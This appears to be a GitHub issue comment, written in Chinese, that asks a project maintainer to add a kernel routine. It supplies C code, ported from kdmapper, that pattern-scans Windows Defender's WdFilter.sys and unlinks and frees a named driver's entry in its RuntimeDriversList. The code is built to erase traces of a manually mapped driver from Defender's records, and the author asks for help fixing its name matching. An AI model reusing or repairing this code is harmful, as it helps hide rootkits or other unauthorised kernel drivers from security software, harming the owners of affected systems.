FiYHer
能加入clear_wdfilter_driver_list吗?
可以增加清理wdfilter.sys中的runtimeDrivers
以下是我从kdmappaer转为内核的代码
`bool clear_wd_filter_driver_list(const wchar_t* name) { DbgBreakPoint(); ULONG WdFilterSize = 0; auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize); if (WdFilter == 0) return false;
auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "48 8B 0D ? ? ? ? FF 05"); if (!RuntimeDriversList) return false;
auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "FF 05 ? ? ? ? 48 39 11"); if (!RuntimeDriversCountRef) return false;
auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9"); if (!MpFreeDriverInfoExRef) { MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9"); if (!MpFreeDriverInfoExRef) return false; }
MpFreeDriverInfoExRef += 0x7; // skip until call instruction
RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3); ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8; ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2); ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8; RuntimeDriversArray = (ULONG64)RuntimeDriversArray; ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);
for (PLIST_ENTRY Entry = (PLIST_ENTRY)(RuntimeDriversList_Head); Entry != (LIST_ENTRY*)RuntimeDriversList_Head; Entry = Entry->Flink) { //PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10); UNICODE_STRING Unicode_String = (UNICODE_STRING)(Entry + 0x10); if (MmIsAddressValid(Unicode_String.Buffer)) { LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer); if (wcsstr(name, Unicode_String.Buffer)) {
//remove from RuntimeDriversArray
bool removedRuntimeDriversArray = false;
PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements
PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
if (value == SameIndexList) {
PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
removedRuntimeDriversArray = true;
break;
}
}
if (!removedRuntimeDriversArray) return false;
auto NextEntry = Entry->Flink;
auto PrevEntry = Entry->Blink;
NextEntry->Blink = PrevEntry;
PrevEntry->Flink = NextEntry;
// decrement RuntimeDriversCount
*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
// call MpFreeDriverInfoEx
ULONG64 DriverInfo = (ULONG64)Entry - 0x20;
//verify DriverInfo Magic
USHORT Magic = *(USHORT*)DriverInfo;
if (Magic != 0xDA18) {
//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
}
else {
using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
MpFreeDriverInfoEx_(DriverInfo);
}
//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
return true;
}
}
}`
这也许可以节省一些时间,但是存在一些问题,就是无法在链表中找到匹配的加载驱动名称
R3原版代码:https://github.com/TheCruZ/kdmapper/blob/master/kdmapper/intel_driver.cpp#L114
您有时间的话可以看一下顺便升级这份内核清理痕迹 水平有限不知道问题出在哪..
